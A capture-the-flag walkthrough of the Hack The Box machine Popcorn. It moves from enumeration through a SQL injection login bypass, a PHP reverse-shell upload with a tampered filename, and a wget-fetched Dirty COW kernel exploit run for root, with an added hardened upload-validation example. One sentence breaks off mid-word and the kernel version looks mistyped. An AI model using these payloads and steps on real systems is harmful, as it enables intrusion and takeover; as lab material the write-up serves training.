HTB - Popcorn
Linux | Burpsuite | SQLi
Tools For This Room
Burpsuite - used for the SQLi authentication bypass and for intercepting the file upload
TL;DR / Executive Summary
Scan and enumerate with nmap and gobuster
Gain foothold with SQLi login and reverse shell upload
Privesc through kernel exploit
Scanning & Enumeration
We kick off with the customary nmap scan
Nmap
nmap -sV -sC -vv <IP>
The following ports are open: 22 (SSH) and 80 (HTTP).

We also run a full port scan, but no further open ports are discovered. Checking out the site on port 80 doesn't give us anything interesting either. Let's turn to gobuster.
gobuster
gobuster dir -u http://<IP> -w <wordlist>
We get a couple of interesting directories, such as /torrent and /cgi-bin/. The /cgi-bin/ directory is particularly interesting, as we've seen it in another HTB room called Shocker, which uses the Shellshock exploit.

Unfortunately, checking out the /cgi-bin/ directory only yields the page above. Let's see what /torrent gives us instead.

After poking around the Torrent Hoster, we find a login page:

Unfortunately, the usual array of username/password combinations doesn't work. However, upon entering the SQL injection ' or 1=1 into both the username and password fields, we get the following response:

This could be a hint that it's vulnerable to a SQLi authentication bypass.
Gaining Foothold
Pulling up Burpsuite, we'll use it to determine whether a SQLi authentication bypass is possible.
First, we'll turn on FoxyProxy, then submit any input in the fields. Then we'll move over to Burpsuite's Proxy tab and send the request to Intruder. In the Positions section of Intruder, we'll Clear § and then Add § around the username and password values. We'll also set the Attack type to Pitchfork, since we are attacking 2 fi

Under Payloads in the Intruder tab, we'll load a list of possible SQLi bypass payloads, which we can get from here. Now we'll run the attack and discover that admin' # returns a different status code from the rest, which means it could log us in.

We try it and we're logged in as admin!

Now that we're logged in, let's find a way to upload a reverse shell and trigger it. Let's set up a netcat listener first.
nc -lvnp <port>
After some browsing around, we find an entry called Kali Linux which we can edit. Clicking on it gives us this page, where we can upload a screenshot for the thumbnail.

Let's set up a .php reverse shell file, which we can get from here. Once we've edited the file to reflect our IP and preferred port, we need to upload it. However, the site states that only jpg, jpeg, gif, and png formats are acceptable, whereas our file needs to be in php format.
First, let's rename our file "shell.php.jpg". Then let's pull up our trusty Burpsuite again and intercept the upload request. Upon uploading the file, we see this.

Under filename, we'll change "shell.php.jpg" to "shell.php", then hit Forward to send the request through. The server accepts it, which shows that the upload check trusts what the client sends rather than inspecting the file itself.
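The upload check being abused here trusts client-controlled values (the filename and Content-Type header). The following is an added, illustrative Python example, not Torrent Hoster's code, contrasting a weak check of that kind with a hardened one that allowlists only the final extension, verifies the image's magic bytes, and discards the client filename when storing the file:

```python
import os
import secrets
from typing import Tuple

# Allowlisted image types and the magic bytes each must begin with.
ALLOWED_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def weak_check(filename: str, content_type: str) -> bool:
    """Illustrative weak check: accepts whatever Content-Type the client declares.
    An intercepted request can rename shell.php.jpg to shell.php and keep
    Content-Type: image/jpeg, so the PHP file is accepted."""
    return content_type in ("image/jpeg", "image/png", "image/gif")


def hardened_check(filename: str, data: bytes) -> Tuple[bool, str]:
    """Validate by the final extension and by file content, never by client headers."""
    base = os.path.basename(filename)
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_MAGIC:
        return False, "extension not in allowlist"
    if not any(data.startswith(magic) for magic in ALLOWED_MAGIC[ext]):
        return False, "content does not match declared image type"
    if b"<?php" in data[:4096] or b"<?=" in data[:4096]:
        # A valid image header with a PHP tag appended is a polyglot; reject it.
        return False, "embedded PHP tag"
    return True, ext


def stored_name(ext: str) -> str:
    """Server-chosen random name so the client filename never reaches disk."""
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    php_payload = b"<?php system($_GET['cmd']); ?>"  # constructed sample content
    print(weak_check("shell.php", "image/jpeg"))        # True: the weak check passes
    print(hardened_check("shell.php", php_payload))     # (False, 'extension not in allowlist')
    print(hardened_check("shell.php.jpg", php_payload)) # (False, 'content does not match ...')
```

Serving the upload directory with script execution disabled (for example, no PHP handler for that path) is the second half of the fix, since validation alone does not stop an already-stored file from being executed.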

Refreshing the page gives us this:

Right-clicking the "Image File Not Found" button and opening it in a new tab triggers the uploaded file, and our listener catches a shell!

After some poking around, we get the user.txt.

Privilege Escalation
We run the usual array of privesc checks, but nothing comes up. However, when we check the kernel version with "uname -a", we find that it's 2.61.31-14. A quick searchsploit check on this gives us some possible exploits:

After a quick Google search, we settle on 40839 as the first candidate. So let's copy it to our working directory and set up a web server to host it.
searchsploit -m linux/local/40839.c
python -m SimpleHTTPServer
Now let's pull it over to the victim machine with wget.
wget <ourIP>:<port>/40839.c
Examining the file, we find it contains the commands needed to compile and run it.
gcc -pthread 40839.c -o dirty -lcrypt
chmod +x dirty
./dirty

Now let's switch to the newly created user firefart, and we are root!

Let's grab that root flag and call it a day.
